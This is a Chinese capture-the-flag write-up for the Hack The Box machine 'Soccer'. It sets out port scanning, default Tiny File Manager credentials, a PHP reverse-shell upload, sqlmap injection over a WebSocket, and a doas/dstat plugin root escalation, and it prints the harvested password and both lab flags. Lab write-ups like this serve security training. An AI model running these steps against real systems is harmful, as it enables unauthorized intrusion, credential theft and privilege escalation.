[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升
字数 1050 2025-08-22 12:23:36

Soccer Tiny 2.4.3 渗透测试完整指南

1. 信息收集

1.1 目标识别

  • IP地址: 10.10.11.194
  • 开放端口:
    • 22/tcp: OpenSSH 8.2p1 Ubuntu
    • 80/tcp: nginx 1.18.0 (Ubuntu)
    • 9091/tcp: 疑似WebSocket服务

1.2 主机发现与端口扫描

ip='10.10.11.194'; itf='tun0';
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
  echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";
  ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//');
  if [ -n "$ports" ]; then
    echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m";
    nmap -Pn -sV -sC -p "$ports" "$ip";
  else
    echo -e "\e[31m[!] No open ports found on $ip.\e[0m";
  fi;
else
  echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m";
fi

1.3 添加主机名到/etc/hosts

echo '10.10.11.194 soccer.htb' >> /etc/hosts

2. Web应用渗透

2.1 目录扫描

使用feroxbuster进行目录扫描:

feroxbuster -u 'http://soccer.htb/'

发现关键路径:

  • http://soccer.htb/tiny/
  • http://soccer.htb/tiny/tinyfilemanager.php

2.2 Tiny File Manager利用

Tiny File Manager版本: 2.4.3

默认凭据:

  1. admin/admin@123
  2. user/12345

上传PHP反向shell:

  1. 访问 http://soccer.htb/tiny/tinyfilemanager.php?p=tiny%2Fuploads&upload
  2. 上传reverse.php文件
  3. 触发执行: curl http://soccer.htb/tiny/uploads/reverse.php

3. 横向移动

3.1 发现子域名

在目标主机上查看/etc/hosts文件:

cat /etc/hosts

添加新发现的主机名:

echo '10.10.11.194 soc-player.soccer.htb' >> /etc/hosts

3.2 WebSocket SQL注入

  1. 访问WebSocket服务:
websocat ws://soc-player.soccer.htb:9091
  1. 使用sqlmap进行自动化注入:
/home/maptnh/sqlmap-dev/sqlmap.py -u 'ws://soc-player.soccer.htb:9091' --data '{"id":"*"}' --batch --level 5 --risk 3 --threads 10 --dbs
  1. 获取数据库凭据:
  • username: player
  • password: PlayerOftheMatch2022

4. 权限提升

4.1 获取user flag

使用获取的凭据登录:

ssh player@soccer.htb

user.txt内容:

f07036b231022261fd0734ac994534dd

4.2 doas权限提升

  1. 检查doas配置:
cat /usr/local/etc/doas.conf
  1. 利用dstat插件执行命令:
echo 'import os; os.system("/bin/bash")' > /usr/local/share/dstat/dstat_bash.py
doas /usr/bin/dstat --bash

4.3 获取root flag

root.txt内容:

ed0c81afb79ac34cabd884fdc3149dbd

5. 总结

本次渗透测试完整路径:

  1. 通过Tiny File Manager 2.4.3的默认凭据获取初始访问
  2. 上传PHP反向shell获取www-data权限
  3. 发现子域名soc-player.soccer.htb
  4. 利用WebSocket SQL注入获取数据库凭据
  5. 使用获取的凭据SSH登录
  6. 通过doas和dstat插件实现权限提升

关键漏洞:

  • Tiny File Manager默认凭据
  • WebSocket SQL注入
  • 配置不当的doas
  • dstat插件可执行任意代码
Soccer Tiny 2.4.3 渗透测试完整指南 1. 信息收集 1.1 目标识别 IP地址: 10.10.11.194 开放端口: 22/tcp: OpenSSH 8.2p1 Ubuntu 80/tcp: nginx 1.18.0 (Ubuntu) 9091/tcp: 疑似WebSocket服务 1.2 主机发现与端口扫描 1.3 添加主机名到/etc/hosts 2. Web应用渗透 2.1 目录扫描 使用feroxbuster进行目录扫描: 发现关键路径: http://soccer.htb/tiny/ http://soccer.htb/tiny/tinyfilemanager.php 2.2 Tiny File Manager利用 Tiny File Manager版本: 2.4.3 默认凭据: admin/admin@123 user/12345 上传PHP反向shell: 访问 http://soccer.htb/tiny/tinyfilemanager.php?p=tiny%2Fuploads&upload 上传reverse.php文件 触发执行: curl http://soccer.htb/tiny/uploads/reverse.php 3. 横向移动 3.1 发现子域名 在目标主机上查看/etc/hosts文件: 添加新发现的主机名: 3.2 WebSocket SQL注入 访问WebSocket服务: 使用sqlmap进行自动化注入: 获取数据库凭据: username: player password: PlayerOftheMatch2022 4. 权限提升 4.1 获取user flag 使用获取的凭据登录: user.txt内容: 4.2 doas权限提升 检查doas配置: 利用dstat插件执行命令: 4.3 获取root flag root.txt内容: 5. 总结 本次渗透测试完整路径: 通过Tiny File Manager 2.4.3的默认凭据获取初始访问 上传PHP反向shell获取www-data权限 发现子域名soc-player.soccer.htb 利用WebSocket SQL注入获取数据库凭据 使用获取的凭据SSH登录 通过doas和dstat插件实现权限提升 关键漏洞: Tiny File Manager默认凭据 WebSocket SQL注入 配置不当的doas dstat插件可执行任意代码